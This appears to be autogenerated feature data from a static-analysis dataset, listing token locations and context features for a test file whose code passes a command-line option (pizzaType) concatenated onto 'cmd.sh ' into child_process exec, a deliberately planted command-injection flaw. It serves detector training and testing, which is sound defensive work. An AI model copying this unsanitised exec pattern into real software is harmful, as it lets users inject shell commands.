autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:30:133:40 | 'commander' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:8 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:8 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:8 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:8 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:8 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:16 | program.version | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:16 | program.version | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:16 | program.version | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:16 | program.version | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:16 | program.version | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | exceptional return of program ... 0.0.1') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | exceptional return of program ... 0.0.1') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | exceptional return of program ... 0.0.1') | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | exceptional return of program ... 0.0.1') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | exceptional return of program ... 0.0.1') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:10:134:16 | version | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:10:134:16 | version | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:10:134:16 | version | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:10:134:16 | version | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:10:134:16 | version | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | CalleeFlexibleAccessPath | program.version | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | calleeImports | commander | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:18:134:24 | '0.0.1' | receiverName | program | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:3 | cp | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:8 | cp.exec | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | exceptional return of cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | exceptional return of cp.exec ... zaType) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | exceptional return of cp.exec ... zaType) | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | exceptional return of cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | exceptional return of cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:5:136:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:5:136:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:5:136:8 | exec | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:5:136:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:5:136:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- program.opts().pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:10:136:45 | "cmd.sh ... zzaType | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:28 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:28 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:28 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:28 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:28 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:33 | program.opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:33 | program.opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:33 | program.opts | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:33 | program.opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:33 | program.opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | exceptional return of program.opts() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | exceptional return of program.opts() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | exceptional return of program.opts() | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | exceptional return of program.opts() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | exceptional return of program.opts() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:45 | program ... zzaType | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:30:136:33 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:30:136:33 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:30:136:33 | opts | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:30:136:33 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:30:136:33 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:37:136:45 | pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:37:136:45 | pizzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:37:136:45 | pizzaType | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:37:136:45 | pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:37:136:45 | pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:3 | cp | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:8 | cp.exec | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | exceptional return of cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | exceptional return of cp.exec ... zaType) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | exceptional return of cp.exec ... zaType) | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | exceptional return of cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | exceptional return of cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:5:137:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:5:137:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:5:137:8 | exec | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:5:137:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:5:137:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:10:137:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- program.pizzaType | +| 